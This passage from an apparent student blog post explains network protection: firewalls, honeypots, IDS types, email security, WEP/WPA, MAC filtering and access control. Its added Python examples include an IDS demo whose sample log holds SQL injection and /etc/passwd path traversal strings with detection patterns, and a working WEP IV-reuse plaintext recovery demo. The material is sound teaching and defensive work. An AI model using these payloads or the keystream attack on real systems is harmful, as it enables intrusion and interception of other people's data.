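    Rule("allow", dst_net="10.0.0.10/32", dport=25),        # anyone may deliver mail
    Rule("deny"),                                           # everything else
]


def matches(rule: Rule, p: Packet) -> bool:
    if rule.src_net and ipaddress.ip_address(p.src) not in ipaddress.ip_network(rule.src_net):
        return False
    if rule.dst_net and ipaddress.ip_address(p.dst) not in ipaddress.ip_network(rule.dst_net):
        return False
    return rule.dport is None or p.dport == rule.dport


def packet_filter(p: Packet) -> str:
    """Stateless packet filter: every packet is judged on its own header fields."""
    for rule in ACL:
        if matches(rule, p):
            return rule.action
    return "deny"


class StatefulFirewall:
    """Stateful inspection: the same ACL decides who may OPEN a connection;
    once a flow is in the state table its reply packets pass without a rule."""

    def __init__(self) -> None:
        self.state: set[tuple[str, int, str, int]] = set()

    def handle(self, p: Packet) -> str:
        reverse = (p.dst, p.dport, p.src, p.sport)
        if reverse in self.state:
            return "allow"                      # reply to a connection we saw opened
        if p.syn and packet_filter(p) == "allow":
            self.state.add((p.src, p.sport, p.dst, p.dport))
            return "allow"
        return "deny"                           # unknown connection, or not permitted


if __name__ == "__main__":
    fw = StatefulFirewall()
    outbound = Packet("10.0.0.5", 51000, "93.184.216.34", 443, syn=True)
    reply = Packet("93.184.216.34", 443, "10.0.0.5", 51000)
    # Stateless: the reply is dropped, because nothing in the ACL describes it.
    print("stateless:", packet_filter(outbound), packet_filter(reply))
    # Stateful: the reply is recognised as belonging to the flow we allowed out.
    print("stateful: ", fw.handle(outbound), fw.handle(reply))
    # An unsolicited packet aimed at the same client port is still refused.
    print("stranger: ", fw.handle(Packet("198.51.100.7", 443, "10.0.0.5", 51000)))
```

With the stateless filter, making the reply work would mean adding a rule like "allow anything from port 443 to the LAN", which any attacker can satisfy by sending from source port 443. The state table removes the need for that hole, which is the whole point of stateful inspection.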

Proxy Firewalls
Proxy firewalls are very secure, but this comes at the expense of speed and functionality. They are secure because, unlike other types of firewall, data packets do not pass through a proxy at all; the proxy terminates the client's connection itself and then opens a separate, new connection of its own to the destination on the client's behalf. There is never a direct connection between the untrusted and trusted systems, so internal addresses are never exposed and malformed packets never reach the inside. Because the proxy understands the application protocol, it can inspect each request up to the application layer and drop anything suspicious before forwarding it to the protected network. The advantages are that it is the most thorough type of inspection and it breaks the connection between trusted and untrusted systems. The disadvantages are that a proxy has to be written for each application protocol, so only a limited number are supported, it degrades traffic performance and slows the network down, and breaking end-to-end connections can interfere with some applications.

HoneyPots
A honeypot is a server set up in the screened subnet or demilitarised zone specifically to lure attackers. It is separate from the real servers and holds dummy information, so the attacker believes they have found the organisation's actual server. To make it attractive the organisation leaves open some services that are popular targets, and to make it realistic it is configured like a real server, with security that is weak enough to get past but not so absent that it looks like a trap. Nobody legitimate has any reason to connect to it, so every connection it receives is suspicious by definition, which gives it a very low false alarm rate.

While the attacker is working on the dummy server the organisation can monitor exactly what they do, learn their tools and methods, and use that to protect the real servers and improve overall security. Detailed logs may also help identify the attacker and can be handed to the police; attacking back is illegal in most jurisdictions and is not an option. A honeypot must be kept isolated from the rest of the network so that it cannot be used as a stepping stone into it.

Intrusion Detection System (IDS)
Intrusion detection systems are used to detect unauthorised entries and alert an administrator to respond. An IDS inspects all inbound and outbound network activity and identifies suspicious patterns that may indicate a network or system attack from someone attempting to compromise a system.


Network Based IDS (NIDS) & Host Based IDS (HIDS)
Network-based systems analyse the packets that flow through the network, typically from a sensor on a mirror port or tap, which helps find malicious traffic the firewall has let through because it matched an allowed rule. Host-based systems run on each individual system or host and watch the activity there: log files, file integrity, processes and system calls. The two complement each other; a NIDS cannot see inside encrypted traffic, while a HIDS sees what the traffic did once it arrived.

Passive & Reactive IDS
Passive intrusion detection systems look out for potential security threats, log the details and signal alerts to the network administrator so that they can respond accordingly. Reactive IDS (now usually called intrusion prevention systems, IPS) respond to the suspicious event themselves, for example by resetting the connection, logging the user being attacked off, or reprogramming the firewall to block all traffic from the source address, which stops further contact with it. The risk with automatic blocking is that a false alarm, or an attacker spoofing a legitimate source address, can cut off genuine users.

Knowledge Based IDS
The majority of intrusion detection systems in use are knowledge based, also called signature based. A knowledge-based IDS applies accumulated knowledge about specific attacks and system vulnerabilities in the form of signatures, patterns that identify a known attack. Because the IDS knows what each attack looks like, it watches for those patterns, and when one matches an alarm is raised and the network administrator notified. An advantage of this type of IDS is its low false alarm rate: if the administrator is notified they know it is worth responding to straight away. The disadvantages are that it can only detect attacks that already have a signature, so new or modified attacks pass unnoticed, and the signature database has to be kept constantly up to date, which takes time and money.

Behaviour Based IDS
This type of IDS assumes an intrusion can be detected by spotting unexpected activity and behaviour on the system. It first learns a baseline of normal behaviour, then compares current activity to it, and raises an alarm when an abnormality is discovered. The advantages are that it can detect previously unknown attacks, for which no signature exists, that it contributes to the discovery of new attacks, and that it helps detect 'abuse of privileges' by insiders whose actions look legitimate to a signature. The main disadvantage is a high false alarm rate, because legitimate but unusual activity also looks abnormal, and an attacker who is slow and careful can stay within the baseline.
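An added Python example (not part of the original post) that runs both approaches over a handful of constructed web-server log lines: two signatures for known attack patterns, and an anomaly rule that flags any client whose request rate is far above a baseline. The log lines, thresholds and IP addresses are made up for the illustration.

```python
import re
from collections import Counter

# Constructed web-server access log (Apache/nginx combined-style prefix), the
# sort of data a host IDS tails or a network sensor reconstructs. Four "normal"
# or hostile lines plus one client fetching 40 pages in a single minute.
LOG = """\
203.0.113.9 - - [20/Jun/2013:10:01:02 +0100] "GET /index.html HTTP/1.1" 200 512
203.0.113.9 - - [20/Jun/2013:10:01:05 +0100] "GET /login?user=admin'%20OR%20'1'='1 HTTP/1.1" 200 812
198.51.100.4 - - [20/Jun/2013:10:01:07 +0100] "GET /../../etc/passwd HTTP/1.1" 404 0
192.0.2.77 - - [20/Jun/2013:10:02:00 +0100] "GET /products HTTP/1.1" 200 2048
""" + "".join(
    f'192.0.2.200 - - [20/Jun/2013:10:03:{s:02d} +0100]Get /item/{s} HTTP/1.1" 200 300\n'.replace("]Get", '] "GET')
    for s in range(40)
)

LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')

# Knowledge-based (signature) detection: patterns for attacks we already know.
SIGNATURES = {
    "sqli": re.compile(r"(%27|')(%20|\s)*or(%20|\s)+", re.IGNORECASE),
    "path_traversal": re.compile(r"(\.\./|%2e%2e%2f)", re.IGNORECASE),
}


def parse(log: str):
    """Yield a regex match per well-formed log line; junk lines are skipped."""
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            yield m


def signature_alerts(log: str) -> list[tuple[str, str]]:
    """One alert per (client, signature) hit. Low false-positive rate, but an
    attack with no signature, or one encoded differently, passes silently."""
    alerts = []
    for m in parse(log):
        for name, pattern in SIGNATURES.items():
            if pattern.search(m["path"]):
                alerts.append((m["ip"], name))
    return alerts


def anomaly_alerts(log: str, baseline_per_minute: float = 5.0,
                   factor: float = 4.0) -> list[tuple[str, int]]:
    """Behaviour-based detection: flag any client whose requests per minute exceed
    `factor` times the learned baseline. Catches unknown attacks (scrapers, brute
    force) but also a legitimate crawler, hence the higher false-alarm rate."""
    per_minute: Counter = Counter()
    for m in parse(log):
        minute = m["ts"][:17]            # "20/Jun/2013:10:03"
        per_minute[(m["ip"], minute)] += 1
    return [(ip, n) for (ip, _), n in per_minute.items()
            if n > baseline_per_minute * factor]


if __name__ == "__main__":
    print("signature:", signature_alerts(LOG))
    print("anomaly:  ", anomaly_alerts(LOG))
```

The two detectors disagree in an instructive way: the signatures catch the SQL injection and the path traversal but say nothing about 192.0.2.200, while the rate rule flags 192.0.2.200 and misses both injection attempts. Raising the baseline to silence a legitimate crawler also hides the scraper, which is the false-alarm trade-off the text describes.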

Tuesday, 5 March 2013

P2 - Describe How Networked Systems Can Be Protected

Emails are a very good method of communication; they do however have the potential to be harmful to a network. 

Spam Guard
Spam is one of the most common email security risks. Spam involves identical emails being sent to hundreds of thousands of people in the hope that a small percentage of recipients open them and are interested. The majority of spam advertises a product or service, but some of it carries malware attachments or links to phishing websites. At the time of writing roughly 130 billion spam emails were estimated to be sent every day, which is why it is vital to protect your organisation against it. In addition to wasting people's time, spam uses up network bandwidth and mail server storage. Spammers collect email addresses from chat rooms, websites, customer lists, newsgroups, and from malware that harvests users' address books, and the lists are sold on to other spammers. Sending the emails costs the spammer almost nothing, so even if only one recipient in a million buys the product they make money. Spam filtering is usually already provided by the mail service; for example webmail such as Gmail or Hotmail has it built in. The user trains the filter by marking emails as spam; each time a user does this the filter updates its model, so the next time a similar email arrives it goes straight into the spam folder. Organisational filters also use sender reputation and block lists, and should quarantine rather than silently delete, so that genuine mail that is misclassified can be recovered.

Hoaxing
Hoaxing is another risk regarding email; the usual term is phishing. It is the act of sending fake emails to a number of recipients to trick them into handing over information. For example an attacker sends an email claiming to be from the recipient's bank, asking for their account details. The attacker makes the email appear to come from the bank by forging the From address, which is easy because the basic email protocol does not verify it; this can be done with ordinary mail software or a website. The user looks at the address, trusts the email and follows the link to a copy of the bank's site. The spam filter removes most phishing emails, but some still get through, so users should be taught that a bank will never ask for credentials by email and should go to the site by typing the address rather than following the link. On the server side, the sending domain can be verified with SPF and DKIM (and a DMARC policy that says what to do when they fail), which rejects mail that merely claims to be from your domain; signed email with S/MIME, described next, goes further and verifies the individual sender, but only where both sides have set it up.

Secure MIME
As mentioned above, Secure Multipurpose Internet Mail Extensions (S/MIME) is a widely used standard for securing email. Each user has a certificate and key pair; messages can be signed, so the recipient can verify who sent them and that they were not altered, and encrypted to the recipient's certificate, so only they can read them, which is vital for any organisation exchanging sensitive information. It does not encrypt all email automatically: it protects only messages between parties who both have certificates and have their mail clients configured to use them, and it protects the message body but not the headers.

WEP & WPA
WEP is short for Wired Equivalent Privacy; it was the original method of encrypting data over IEEE 802.11 wireless networks and was designed to give wireless the same level of privacy as a wired LAN, since wireless is broadcast over radio and far easier to intercept. WEP is a very weak method: it uses the RC4 stream cipher with a 24-bit initialisation vector that repeats on a busy network, and flaws in how the key is used let an attacker who captures enough traffic recover the network key in minutes, so data protected with it can be read quite easily. WPA stands for Wi-Fi Protected Access; it was designed as an interim replacement that could run on existing WEP hardware with a firmware update and fixed WEP's key handling (TKIP). WPA2 replaced RC4 with AES-CCMP and is the one that should be used.
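An added Python example (not part of the original post) of the IV reuse weakness in WEP: RC4 is seeded with the 3-byte IV followed by the shared key, so two frames sent with the same IV are encrypted under the same keystream, and XORing the two ciphertexts together cancels the keystream completely. The key, IV and frame contents are constructed; the CRC-32 integrity value that a real WEP frame carries is omitted, and the key-recovery attacks (FMS/KoreK/PTW) that actually crack the network key build on related RC4 weaknesses not shown here.

```python
def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling then keystream generation. WEP seeds it with
    the 3-byte IV followed by the 40- or 104-bit shared key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """A WEP frame body minus the CRC-32 ICV: the IV travels in the clear,
    followed by plaintext XOR RC4(IV || key)."""
    assert len(iv) == 3
    return iv + xor(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))


def recover_with_reused_iv(frame_a: bytes, frame_b: bytes, known_plaintext_a: bytes) -> bytes:
    """Two frames with the same IV share a keystream K:
         C_a xor C_b = (P_a xor K) xor (P_b xor K) = P_a xor P_b
    so knowing P_a (e.g. a predictable ARP or DHCP packet) gives P_b directly.
    The attacker never needs the key."""
    iv_a, c_a = frame_a[:3], frame_a[3:]
    iv_b, c_b = frame_b[:3], frame_b[3:]
    if iv_a != iv_b:
        raise ValueError("attack needs two frames with the same IV")
    n = min(len(c_a), len(c_b), len(known_plaintext_a))
    return xor(xor(c_a[:n], c_b[:n]), known_plaintext_a[:n])


def demo() -> bytes:
    key = bytes.fromhex("0f1e2d3c4b")           # constructed 40-bit WEP key
    iv = bytes.fromhex("000001")                # only 2^24 IVs exist; repeats are inevitable
    p_a = b"ARP request: who has 10.0.0.1? "    # assumed known/predictable frame
    p_b = b"POST /login user=admin pass=hunter2" # constructed secret frame
    frame_a = wep_encrypt(key, iv, p_a)
    frame_b = wep_encrypt(key, iv, p_b)         # same IV reused by the access point
    return recover_with_reused_iv(frame_a, frame_b, p_a)


if __name__ == "__main__":
    print(demo())   # the first len(p_a) bytes of p_b, recovered without the key
```

With 2^24 possible IVs and many access points resetting the counter at boot, a busy network repeats IVs within hours, and many WEP frames (ARP, DHCP, IP headers) have largely predictable contents, which is why the known-plaintext half of this attack is realistic. The standard RC4 test vector (key "Key", plaintext "Plaintext") confirms the cipher implementation itself.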

MAC Association
MAC association (MAC filtering) is another method suggested for securing a network: you give the access point or switch a list of the MAC addresses of the computers that are allowed to connect, and any other address is refused (a DHCP server can be given reservations too, but that only controls which IP address a device gets, not whether it can join). The method is much weaker than it sounds: a MAC address is not a secret, it is transmitted in the clear in every frame, and it can be changed in software on almost any operating system, so an attacker simply copies the address of a computer that is allowed on. MAC filtering is a minor nuisance for an attacker and an ongoing administration burden for you, and it should never be relied on in place of encryption.

Wireless Access Point ID
Securing your wireless access point is vital; if you don't secure it, somebody may be able to read all incoming and outgoing data. One simple measure is to change the SSID (the network name): if you leave it as "BTHomeHub352" an attacker knows you have a BT Home Hub and can try that model's default admin password and passphrase pattern. Changing the admin password is what actually closes that hole; the name change only removes a hint. Another commonly suggested method is hiding the SSID so that your network does not appear when somebody searches for Wi-Fi. This makes it less visible to casual users but not secure, because the name is still sent in the clear every time one of your own devices connects, and any wireless scanning tool shows hidden networks; use it, if at all, alongside WPA2 rather than instead of it.

Shielded Cable
Shielded cable is sometimes described as a security measure. Its shielding reduces the electromagnetic signal radiating from the cable, which makes passive interception from nearby harder, but it provides no protection against an attacker who can physically reach the cable and splice in a tap. For real protection the cable must be physically inaccessible (in conduit, ceilings or locked risers) and the traffic itself must be encrypted, for example with IPsec or TLS, so that a tap yields nothing readable.

Personal Access Control
There are many methods of access control, these are:
  • Something you know - Such as passwords or PINs. This is the most common type of access control although it certainly isn't the most secure: passwords can be guessed with specialist software, phished, or reused from another site's breach.
  • Something you have - Such as an ID card or a one-time-code token. This is a good method because you need the object to gain access, although it can be lost or stolen, so it should be combined with a PIN or password and revoked promptly when reported missing.
  • Something you are - Such as a fingerprint. If a fingerprint were required to enter the server room, only enrolled people could get in, and they cannot lend the credential to anybody else; the trade-off is that biometric readers can be fooled by copies and a compromised fingerprint cannot be replaced. The strongest access control combines two of these three factors.
Encryption
Encryption is the most effective way to protect the confidentiality of data. It converts the data into an unreadable format, and a secret key or password is then needed to decrypt it. When sending data it is encrypted before it is sent and decrypted when it is received by the other user, so anybody who intercepts it on the way sees only ciphertext; stored data should be encrypted as well so that a stolen laptop or backup tape does not expose it. Encryption on its own does not stop somebody altering the ciphertext, so it is normally combined with a message authentication code or signature that detects tampering.